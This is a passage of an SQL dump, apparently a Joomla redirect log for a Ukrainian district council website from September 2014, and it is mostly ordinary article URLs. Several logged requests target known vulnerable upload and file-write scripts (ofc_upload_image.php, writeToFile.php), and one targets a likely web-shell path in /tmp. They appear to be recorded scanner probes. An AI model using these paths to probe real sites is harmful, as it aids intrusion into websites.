00:00:00',301),(5053,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1258:2014-03-31-06-18-35&catid=11&lang=en','','','',7,0,'2014-09-26 10:34:16','0000-00-00 00:00:00',301),(5054,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1272:2014-04-09-05-15-36&catid=10&Itemid=17&lang=uk','','','',9,0,'2014-09-26 10:37:50','0000-00-00 00:00:00',301),(5055,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=941:2013-02-27-14-30-15&catid=11&lang=ru&Itemid=0','','','',5,0,'2014-09-26 10:39:58','0000-00-00 00:00:00',301),(5056,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1378:2014-08-27-11-29-34&catid=11&lang=uk','','','',4,0,'2014-09-26 10:41:44','0000-00-00 00:00:00',301),(5057,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1224:----25--2014-&catid=11&lang=en','','','',8,0,'2014-09-26 10:52:04','0000-00-00 00:00:00',301),(5058,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1236:2014-03-07-06-36-44&catid=11&lang=en','','','',9,0,'2014-09-26 10:57:05','0000-00-00 00:00:00',301),(5059,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1266:2014-04-03-05-25-14&catid=11&lang=en','','','',9,0,'2014-09-26 10:57:46','0000-00-00 00:00:00',301),(5060,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1353:2014-07-01-05-08-54&catid=11&lang=en&Itemid=','','','',8,0,'2014-09-26 11:07:02','0000-00-00 00:00:00',301),(5061,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1231:-q-q&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',6,0,'2014-09-26 11:09:11','0000-00-00 00:00:00',301),(5062,'http://www.malyn-rayrada.org.ua/index.php?option=com_phocagallery&view=category&id=1&Itemid=32&lang=uk','','','',18,0,'2014-09-26 11:20:35','0000-00-00 00:00:00',301),(5063,'http://www.malyn-rayrada.org.ua/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=a','','','',13,0,'2014-09-26 11:25:22','0000-00-00 00:00:00',301),(5064,'http://www.malyn-rayrada.org.ua/administrator/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php?name=a','','','',13,0,'2014-09-26 11:25:27','0000-00-00 00:00:00',301),(5065,'http://www.malyn-rayrada.org.ua/components/com_community/index.html','','','',455,0,'2014-09-26 11:25:30','0000-00-00 00:00:00',301),(5066,'http://www.malyn-rayrada.org.ua/components/com_oziogallery/imagin/scripts_ralcr/filesystem/writeToFile.php','','','',32,0,'2014-09-26 11:25:35','0000-00-00 00:00:00',301),(5067,'http://www.malyn-rayrada.org.ua/components/com_oziogallery2/imagin/scripts_ralcr/filesystem/writeToFile.php','','','',32,0,'2014-09-26 11:25:40','0000-00-00 00:00:00',301),(5068,'http://www.malyn-rayrada.org.ua/vn/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=a','','','',1,0,'2014-09-26 11:25:47','0000-00-00 00:00:00',301),(5069,'http://www.malyn-rayrada.org.ua/vn/administrator/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php?name=a','','','',1,0,'2014-09-26 11:25:51','0000-00-00 00:00:00',301),(5070,'http://www.malyn-rayrada.org.ua/vn/components/com_community/index.html','','','',1,0,'2014-09-26 11:25:54','0000-00-00 00:00:00',301),(5071,'http://www.malyn-rayrada.org.ua/vn/components/com_oziogallery/imagin/scripts_ralcr/filesystem/writeToFile.php','','','',1,0,'2014-09-26 11:26:01','0000-00-00 00:00:00',301),(5072,'http://www.malyn-rayrada.org.ua/vn/components/com_oziogallery2/imagin/scripts_ralcr/filesystem/writeToFile.php','','','',1,0,'2014-09-26 11:26:08','0000-00-00 00:00:00',301),(5073,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1257:2014-03-29-18-03-31&catid=11&Itemid=14&lang=uk','','','',10,0,'2014-09-26 11:28:23','0000-00-00 00:00:00',301),(5074,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1340:------l---28r&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',9,0,'2014-09-26 11:29:48','0000-00-00 00:00:00',301),(5075,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1248:2014-03-21-18-16-44&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',11,0,'2014-09-26 11:52:30','0000-00-00 00:00:00',301),(5076,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=960:-19-&catid=11&lang=uk&Itemid=','','','',1,0,'2014-09-26 12:35:53','0000-00-00 00:00:00',301),(5077,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1166:2014-01-06-08-21-04&catid=11&lang=ru','','','',4,0,'2014-09-26 12:37:37','0000-00-00 00:00:00',301),(5078,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=940:2013-02-21-14-02-14&catid=11&Itemid=14&lang=uk','','','',4,0,'2014-09-26 12:42:12','0000-00-00 00:00:00',301),(5079,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=960:-19-&catid=11&lang=ru&Itemid=0','','','',2,0,'2014-09-26 12:52:49','0000-00-00 00:00:00',301),(5080,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=890:2014-01-06-08-19-15&catid=11&lang=ru&Itemid=0','','','',1,0,'2014-09-26 13:06:14','0000-00-00 00:00:00',301),(5081,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=890:2013-01-06-09-42-40&catid=11&lang=ru','','','',2,0,'2014-09-26 13:22:44','0000-00-00 00:00:00',301),(5082,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=960:-19-&catid=11&lang=uk&Itemid=0','','','',2,0,'2014-09-26 13:35:32','0000-00-00 00:00:00',301),(5083,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1280:-2014-&catid=57&Itemid=98&lang=en','','','',2,0,'2014-09-26 13:37:09','0000-00-00 00:00:00',301),(5084,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=890:2013-01-06-09-42-40&catid=11&lang=ru&Itemid=','','','',3,0,'2014-09-26 13:51:55','0000-00-00 00:00:00',301),(5085,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=955:2013-03-07-06-31-04&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',4,0,'2014-09-26 14:14:08','0000-00-00 00:00:00',301),(5086,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1323:2014-05-27-13-21-50&catid=36:2011-07-21-07-51-53&Itemid=70&lang=ru','','','',8,0,'2014-09-26 15:13:40','0000-00-00 00:00:00',301),(5087,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1281:2014-04-15-09-13-01&catid=57:--15042014-&Itemid=98&lang=ru','','','',4,0,'2014-09-26 16:17:08','0000-00-00 00:00:00',301),(5088,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1283:2014-04-15-16-30-00&catid=11&lang=en&Itemid=','','','',14,0,'2014-09-26 16:41:25','0000-00-00 00:00:00',301),(5089,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1255:2014-03-27-06-02-11&catid=10&Itemid=17&lang=uk','','','',6,0,'2014-09-26 17:03:53','0000-00-00 00:00:00',301),(5090,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1146:2013-11-27-10-09-00&catid=11&lang=en&Itemid=','','','',11,0,'2014-09-26 18:12:22','0000-00-00 00:00:00',301),(5091,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=975:-2012-2015-&catid=49&Itemid=88&lang=en','','','',1,0,'2014-09-26 18:19:29','0000-00-00 00:00:00',301),(5092,'http://www.malyn-rayrada.org.ua/index.php?view=article&catid=11:2010-06-05-14-33-33&id=1234:2014-03-04-09-59-46&tmpl=component&print=1&layout=default&page=&lang=uk','','','',3,0,'2014-09-26 18:19:53','0000-00-00 00:00:00',301),(5093,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1184:----27----6-&catid=11&lang=ru&Itemid=','','','',5,0,'2014-09-26 19:10:34','0000-00-00 00:00:00',301),(5094,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1281:2014-04-15-09-13-01&catid=57&Itemid=98&lang=uk','','','',2,0,'2014-09-26 19:47:56','0000-00-00 00:00:00',301),(5095,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1307:2014-04-30-15-26-52&catid=10:2010-06-05-13-46-44&Itemid=17&lang=en','','','',21,0,'2014-09-26 19:49:18','0000-00-00 00:00:00',301),(5096,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1276:2014-04-10-13-26-15&catid=57:--15042014-&Itemid=98&lang=en','','','',7,0,'2014-09-26 20:00:35','0000-00-00 00:00:00',301),(5097,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1213:2014-02-14-13-53-12&catid=11&lang=en&Itemid=','','','',4,0,'2014-09-26 20:11:33','0000-00-00 00:00:00',301),(5098,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1251:2014-03-24-07-11-22&catid=57&Itemid=98&lang=en','','','',8,0,'2014-09-26 20:14:00','0000-00-00 00:00:00',301),(5099,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1305:-30----&catid=11&lang=en','','','',2,0,'2014-09-26 20:14:36','0000-00-00 00:00:00',301),(5100,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1281:2014-04-15-09-13-01&catid=57:--15042014-&Itemid=98&lang=uk','','','',3,0,'2014-09-26 20:32:28','0000-00-00 00:00:00',301),(5101,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1237:-200-&catid=11&lang=en&Itemid=','','','',11,0,'2014-09-26 20:35:31','0000-00-00 00:00:00',301),(5102,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1218:2014-02-21-15-02-18&catid=11&lang=en&Itemid=','','','',4,0,'2014-09-26 20:35:42','0000-00-00 00:00:00',301),(5103,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1062:2013-07-29-13-33-29&catid=11&lang=en&Itemid=0','','','',4,0,'2014-09-26 20:38:11','0000-00-00 00:00:00',301),(5104,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1213:2014-02-14-13-53-12&catid=11&lang=en','','','',5,0,'2014-09-26 20:42:06','0000-00-00 00:00:00',301),(5105,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1305:-30----&catid=11&lang=en&Itemid=0','','','',4,0,'2014-09-26 20:43:46','0000-00-00 00:00:00',301),(5106,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1237:-200-&catid=11&lang=en&Itemid=','','','',3,0,'2014-09-26 20:51:08','0000-00-00 00:00:00',301),(5107,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1218:2014-02-21-15-02-18&catid=11&lang=en','','','',5,0,'2014-09-26 20:52:13','0000-00-00 00:00:00',301),(5108,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1305:-30----&catid=11&lang=en&Itemid=','','','',5,0,'2014-09-26 21:00:10','0000-00-00 00:00:00',301),(5109,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1281:2014-04-15-09-13-01&catid=57:--15042014-&Itemid=98&lang=ru','','','',3,0,'2014-09-26 21:01:48','0000-00-00 00:00:00',301),(5110,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1196:2014-01-30-14-12-50&catid=11&lang=en&Itemid=','','','',2,0,'2014-09-26 21:03:28','0000-00-00 00:00:00',301),(5111,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1196:2014-01-30-14-12-50&catid=11&lang=en&Itemid=0','','','',3,0,'2014-09-26 21:05:41','0000-00-00 00:00:00',301),(5112,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1305:-30----&catid=11&lang=en&Itemid=0','','','',4,0,'2014-09-26 21:05:57','0000-00-00 00:00:00',301),(5113,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1196:2014-01-30-14-12-50&catid=11&lang=en','','','',5,0,'2014-09-26 21:06:18','0000-00-00 00:00:00',301),(5114,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1218:2014-02-21-15-02-18&catid=11&lang=en&Itemid=','','','',4,0,'2014-09-26 21:07:57','0000-00-00 00:00:00',301),(5115,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1256:2014-03-27-17-22-43&catid=11&lang=uk','','','',2,0,'2014-09-26 21:10:23','0000-00-00 00:00:00',301),(5116,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1166:2014-01-06-08-21-04&catid=11&lang=en','','','',2,0,'2014-09-26 21:11:02','0000-00-00 00:00:00',301),(5117,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1213:2014-02-14-13-53-12&catid=11&lang=en&Itemid=','','','',4,0,'2014-09-26 21:11:27','0000-00-00 00:00:00',301),(5118,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1372:2014-08-04-19-26-16&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',24,0,'2014-09-26 21:15:42','0000-00-00 00:00:00',301),(5119,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1283:2014-04-15-16-30-00&catid=11&lang=en&Itemid=0','','','',2,0,'2014-09-26 21:19:51','0000-00-00 00:00:00',301),(5120,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1196:2014-01-30-14-12-50&catid=11&lang=en&Itemid=','','','',4,0,'2014-09-26 21:21:25','0000-00-00 00:00:00',301),(5121,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1256:2014-03-27-17-22-43&catid=11&lang=ru','','','',2,0,'2014-09-26 21:26:02','0000-00-00 00:00:00',301),(5122,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1204:2014-01-31-07-51-23&catid=56&Itemid=97&lang=uk','','','',9,0,'2014-09-26 21:31:45','0000-00-00 00:00:00',301),(5123,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1072:-24-6-&catid=11&lang=uk','','','',2,0,'2014-09-26 21:32:00','0000-00-00 00:00:00',301),(5124,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1125:2013-10-31-07-20-16&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',4,0,'2014-09-26 21:39:22','0000-00-00 00:00:00',301),(5125,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=890:2013-01-06-09-42-40&catid=11&lang=en&Itemid=','','','',1,0,'2014-09-26 21:39:29','0000-00-00 00:00:00',301),(5126,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=890:2014-01-06-08-19-15&catid=11&lang=en&Itemid=','','','',1,0,'2014-09-26 21:39:38','0000-00-00 00:00:00',301),(5127,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1256:2014-03-27-17-22-43&catid=11&lang=ru&Itemid=','','','',2,0,'2014-09-26 21:41:41','0000-00-00 00:00:00',301),(5128,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1125:2013-10-31-07-20-16&catid=11&Itemid=14&lang=ru','','','',3,0,'2014-09-26 21:44:06','0000-00-00 00:00:00',301),(5129,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=890:2014-01-06-08-19-15&catid=11&lang=en&Itemid=0','','','',1,0,'2014-09-26 21:54:56','0000-00-00 00:00:00',301),(5130,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1166:2014-01-06-08-21-04&catid=11&lang=en','','','',3,0,'2014-09-26 21:55:11','0000-00-00 00:00:00',301),(5131,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1281:2014-04-15-09-13-01&catid=57&Itemid=98&lang=ru','','','',4,0,'2014-09-26 21:58:33','0000-00-00 00:00:00',301),(5132,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1157:-11-2013-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',14,0,'2014-09-26 21:59:29','0000-00-00 00:00:00',301),(5133,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1072:-24-6-&catid=11&lang=uk&Itemid=','','','',2,0,'2014-09-26 22:00:36','0000-00-00 00:00:00',301),(5134,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=890:2013-01-06-09-42-40&catid=11&lang=en','','','',2,0,'2014-09-26 22:10:34','0000-00-00 00:00:00',301),(5135,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=990:-2013-&lang=uk&option=com_content&view=article','','','',2,0,'2014-09-26 22:22:08','0000-00-00 00:00:00',301),(5136,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1072:-24-6-&catid=11&lang=ru&Itemid=0','','','',2,0,'2014-09-26 22:31:08','0000-00-00 00:00:00',301),(5137,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=890:2013-01-06-09-42-40&catid=11&lang=en&Itemid=0','','','',1,0,'2014-09-26 22:38:04','0000-00-00 00:00:00',301),(5138,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1072:-24-6-&catid=11&lang=uk&Itemid=0','','','',2,0,'2014-09-26 22:48:58','0000-00-00 00:00:00',301),(5139,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=984:-20-&catid=11&lang=ru','','','',2,0,'2014-09-26 22:49:19','0000-00-00 00:00:00',301),(5140,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1277:-2014-&catid=36&Itemid=70&lang=en','','','',4,0,'2014-09-26 22:56:33','0000-00-00 00:00:00',301),(5141,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=890:2014-01-06-08-19-15&catid=11&lang=en&Itemid=','','','',1,0,'2014-09-26 23:07:21','0000-00-00 00:00:00',301),(5142,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1072:-24-6-&catid=11&lang=ru&Itemid=0','','','',2,0,'2014-09-26 23:18:00','0000-00-00 00:00:00',301),(5143,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=984:-20-&catid=11&lang=uk&Itemid=','','','',4,0,'2014-09-26 23:18:23','0000-00-00 00:00:00',301),(5144,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1166:2014-01-06-08-21-04&catid=11&lang=en&Itemid=','','','',2,0,'2014-09-26 23:35:59','0000-00-00 00:00:00',301),(5145,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1166:2014-01-06-08-21-04&catid=11&lang=en&Itemid=0','','','',3,0,'2014-09-26 23:53:24','0000-00-00 00:00:00',301),(5146,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1202:2014-01-31-07-45-54&catid=56&Itemid=97&lang=ru','','','',7,0,'2014-09-27 00:02:55','0000-00-00 00:00:00',301),(5147,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1372:2014-08-04-19-26-16&catid=11&Itemid=14&lang=ru','','','',9,0,'2014-09-27 00:39:07','0000-00-00 00:00:00',301),(5148,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1104:-lr&catid=53&Itemid=94&lang=en','','','',6,0,'2014-09-27 00:39:46','0000-00-00 00:00:00',301),(5149,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1359:2014-07-07-08-13-48&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',7,0,'2014-09-27 00:42:18','0000-00-00 00:00:00',301),(5150,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1315:-31-6-&catid=11&lang=uk&Itemid=','','','',5,0,'2014-09-27 03:08:19','0000-00-00 00:00:00',301),(5151,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1163:2013-12-20-07-44-35&catid=15&lang=uk','','','',2,0,'2014-09-27 03:26:36','0000-00-00 00:00:00',301),(5152,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1163:2013-12-20-07-44-35&catid=15&lang=ru','','','',1,0,'2014-09-27 03:42:37','0000-00-00 00:00:00',301),(5153,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1163:2013-12-20-07-44-35&catid=15&lang=ru&Itemid=','','','',2,0,'2014-09-27 03:42:41','0000-00-00 00:00:00',301),(5154,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1247:2014-03-20-14-37-15&catid=11&Itemid=14&lang=en','','','',8,0,'2014-09-27 03:43:00','0000-00-00 00:00:00',301),(5155,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=970:-90-&catid=11&lang=en&Itemid=','','','',3,0,'2014-09-27 03:43:24','0000-00-00 00:00:00',301),(5156,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1163:2013-12-20-07-44-35&catid=15&lang=ru&Itemid=0','','','',2,0,'2014-09-27 03:47:57','0000-00-00 00:00:00',301),(5157,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1163:2013-12-20-07-44-35&catid=15&lang=uk&Itemid=','','','',2,0,'2014-09-27 03:58:26','0000-00-00 00:00:00',301),(5158,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1261:2014-03-31-11-35-31&catid=10&Itemid=17&lang=en','','','',1,0,'2014-09-27 04:12:41','0000-00-00 00:00:00',301),(5159,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1163:2013-12-20-07-44-35&catid=15&lang=uk&Itemid=0','','','',2,0,'2014-09-27 04:16:45','0000-00-00 00:00:00',301),(5160,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1261:2014-03-31-11-35-31&catid=10:2010-06-05-13-46-44&Itemid=17&lang=en','','','',1,0,'2014-09-27 04:21:06','0000-00-00 00:00:00',301),(5161,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=941:2013-02-27-14-30-15&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',5,0,'2014-09-27 04:43:24','0000-00-00 00:00:00',301),(5162,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=1&Itemid=10&lang=uk','','','',10,0,'2014-09-27 04:49:02','0000-00-00 00:00:00',301),(5163,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1261:2014-03-31-11-35-31&catid=10&Itemid=17&lang=en','','','',5,0,'2014-09-27 04:55:19','0000-00-00 00:00:00',301),(5164,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1202:2014-01-31-07-45-54&catid=56:--03022014-&Itemid=97&lang=ru','','','',7,0,'2014-09-27 05:09:19','0000-00-00 00:00:00',301),(5165,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=990:-2013-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',3,0,'2014-09-27 05:09:51','0000-00-00 00:00:00',301),(5166,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=888:-2012-&catid=46:--21122012&Itemid=85&lang=en','','','',1,0,'2014-09-27 05:11:51','0000-00-00 00:00:00',301),(5167,'http://malyn-rayrada.org.ua/tmp/in.php?ari=ari','','','',1,0,'2014-09-27 05:14:16','0000-00-00 00:00:00',301),(5168,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1202:2014-01-31-07-45-54&catid=56:--03022014-&Itemid=97&lang=ru','','','',3,0,'2014-09-27 05:17:08','0000-00-00 00:00:00',301),(5169,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1202:2014-01-31-07-45-54&catid=56&Itemid=97&lang=ru','','','',3,0,'2014-09-27 05:32:14','0000-00-00 00:00:00',301),(5170,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=888:-------2012-&catid=46:--21122012&Itemid=85&lang=en','','','',10,0,'2014-09-27 05:42:27','0000-00-00 00:00:00',301),(5171,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1147:2013-11-28-09-57-12&catid=11&lang=en&Itemid=','','','',2,0,'2014-09-27 06:15:19','0000-00-00 00:00:00',301),(5172,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1352:2014-06-26-06-51-20&catid=11&lang=uk&Itemid=','','','',2,0,'2014-09-27 06:54:52','0000-00-00 00:00:00',301),(5173,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1362:-------2015-----------&catid=36:2011-07-21-07-51-53&Itemid=70&lang=en','','','',1,0,'2014-09-27 07:00:33','0000-00-00 00:00:00',301),(5174,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1362:-------2015-----------&catid=36:2011-07-21-07-51-53&Itemid=70&lang=ru','','','',1,0,'2014-09-27 07:00:50','0000-00-00 00:00:00',301),(5175,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1362:-------2015-----------&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',1,0,'2014-09-27 07:00:55','0000-00-00 00:00:00',301),(5176,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1363:--qq&catid=11&Itemid=14&lang=en','','','',1,0,'2014-09-27 07:01:00','0000-00-00 00:00:00',301),(5177,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1363:--qq&catid=11&Itemid=14&lang=ru','','','',1,0,'2014-09-27 07:01:04','0000-00-00 00:00:00',301),(5178,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1363:--qq&catid=11&Itemid=14&lang=uk','','','',1,0,'2014-09-27 07:01:08','0000-00-00 00:00:00',301),(5179,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1363:--qq&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',1,0,'2014-09-27 07:01:31','0000-00-00 00:00:00',301),(5180,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1363:--qq&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',1,0,'2014-09-27 07:01:49','0000-00-00 00:00:00',301),(5181,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1363:--qq&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',1,0,'2014-09-27 07:01:53','0000-00-00 00:00:00',301),(5182,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1352:2014-06-26-06-51-20&catid=11&lang=ru','','','',2,0,'2014-09-27 07:23:32','0000-00-00 00:00:00',301),(5183,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1352:2014-06-26-06-51-20&catid=11&lang=ru&Itemid=','','','',2,0,'2014-09-27 07:23:35','0000-00-00 00:00:00',301),(5184,'http://malyn-rayrada.org.ua/index.php?option=com_phocagallery&view=categories&lang=en','','','',10,0,'2014-09-27 07:41:41','0000-00-00 00:00:00',301),(5185,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1352:2014-06-26-06-51-20&catid=11&lang=ru&Itemid=0','','','',2,0,'2014-09-27 07:52:13','0000-00-00 00:00:00',301),(5186,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1352:2014-06-26-06-51-20&catid=11&lang=uk&Itemid=0','','','',2,0,'2014-09-27 08:07:49','0000-00-00 00:00:00',301),(5187,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1176:-27-&catid=11&Itemid=14&lang=ru','','','',4,0,'2014-09-27 08:50:50','0000-00-00 00:00:00',301),(5188,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1178:2014-01-21-12-39-34&catid=11&Itemid=14&lang=ru','','','',6,0,'2014-09-27 08:51:01','0000-00-00 00:00:00',301),(5189,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1185:2014-01-28-09-38-54&catid=36:2011-07-21-07-51-53&Itemid=70&lang=ru','','','',5,0,'2014-09-27 08:51:16','0000-00-00 00:00:00',301),(5190,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1185:2014-01-28-09-38-54&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',6,0,'2014-09-27 08:51:18','0000-00-00 00:00:00',301),(5191,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1187:2014-01-28-09-43-51&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',9,0,'2014-09-27 08:51:45','0000-00-00 00:00:00',301),(5192,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1188:2014-01-28-09-45-21&catid=36:2011-07-21-07-51-53&Itemid=70&lang=ru','','','',1,0,'2014-09-27 08:51:57','0000-00-00 00:00:00',301),(5193,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1188:2014-01-28-09-45-21&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',7,0,'2014-09-27 08:52:02','0000-00-00 00:00:00',301),(5194,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1360:-------qq&catid=11&Itemid=14&lang=en','','','',1,0,'2014-09-27 08:52:05','0000-00-00 